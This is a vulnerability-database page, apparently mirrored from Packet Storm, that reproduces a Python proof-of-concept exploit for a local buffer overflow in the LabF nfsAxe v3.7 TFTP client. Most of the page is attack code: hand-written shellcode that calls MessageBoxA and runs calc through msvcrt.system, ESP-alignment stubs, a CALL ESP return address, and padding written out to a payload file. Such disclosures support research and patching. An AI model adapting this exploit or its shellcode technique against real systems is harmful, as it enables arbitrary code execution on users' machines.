Lucene search
K

LabF nfsAxe 3.7 TFTP Client Local Buffer Overflow Client

🗓️ 30 Jan 2018 00:00:00Reported by Miguel Mendez ZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

LabF nfsAxe v3.7 TFTP Client local buffer overflow exploi

Code
`#!/usr/bin/python  
########################################################################################################  
# Exploit Author: Miguel Mendez Z  
# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow   
# Date: 29-01-2018  
# Software: LabF nfsAxe  
# Version: v3.7  
# Vendor Homepage: http://www.labf.com  
# Software Link: http://www.labf.com/download/nfsaxe.exe  
# Tested on: Windows 7 x86  
########################################################################################################  
  
import struct  
  
ropAlignEsp = (  
"\x83\xEC\x58" #SUB ESP,58  
"\x83\xEC\x58" #SUB ESP,58  
"\x83\xEC\x58" #SUB ESP,58  
"\x83\xEC\x58" #SUB ESP,58  
"\x83\xEC\x10" #SUB ESP,10  
"\xFF\xE4" #JMP ESP  
)  
  
scode = "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF  
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111  
scode += "\x51" #PUSH ECX  
scode += "\x68\x31\x30\x73\x21" #PUSH 31307321  
scode += "\x68\x73\x31\x6b\x72" #PUSH 73316b72  
scode += "\x68\x5f\x62\x79\x5f" #PUSH 5f62795f  
scode += "\x68\x70\x77\x6e\x64" #PUSH 70776e64  
scode += "\x68\x42\x30\x66\x5f" #PUSH 4230665f  
scode += "\x8B\xD4" #MOV EDX,ESP  
scode += "\x48" #DEC EAX  
scode += "\x50" #PUSH EAX  
scode += "\x52" #PUSH EDX  
scode += "\x52" #PUSH EDX  
scode += "\x50" #PUSH EAX  
scode += "\xBA\x11\xEA\x1A\x76" #MOV EDX,USER32.MessageBoxA() (Change)  
scode += "\xFF\xD2" #CALL EDX  
#--------------  
scode += "\x33\xD2" #XOR EDX,EDX  
scode += "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF  
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111  
scode += "\x51" #PUSH ECX  
scode += "\x68\x63\x61\x6c\x63" #PUSH 0x63616c63  
scode += "\x8B\xD4" #MOV EDX,ESP  
scode += "\x52" #PUSH EDX  
scode += "\x33\xD2" #XOR EDX,EDX  
scode += "\xBA\x6F\xB1\x0F\x76" #MOV EDX,msvcrt.system - 0x760fb16f (Change)  
scode += "\xFF\xD2" #CALL EDX  
#--------------  
scode += "\x50" #PUSH EAX  
scode += "\xB8\xE2\xBB\xB5\x75" #MOV EAX,kernel32.ExitProcess() (Change)  
scode += "\xFF\xD0" #CALL EAX  
  
offset = "Host: "+scode+"A"*(1000-len(scode))+"\n"  
offset += "File(s): "+"B"*33  
offset += struct.pack("<L",0x75A6923D) #CALL ESP ADVAPI32.DLL   
offset += "B"*5  
offset += ropAlignEsp  
offset += "B"*(1037-37+(len(ropAlignEsp)-5))+"\n"  
offset += "Remote Dir y Local Dir: "+"C"*1000  
  
payload = offset  
print "Payload len: "+str(len(payload))  
print "Shellcode len: "+str(len(scode))  
  
file=open('tftpPoc.txt','w')  
file.write(payload)  
file.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1
28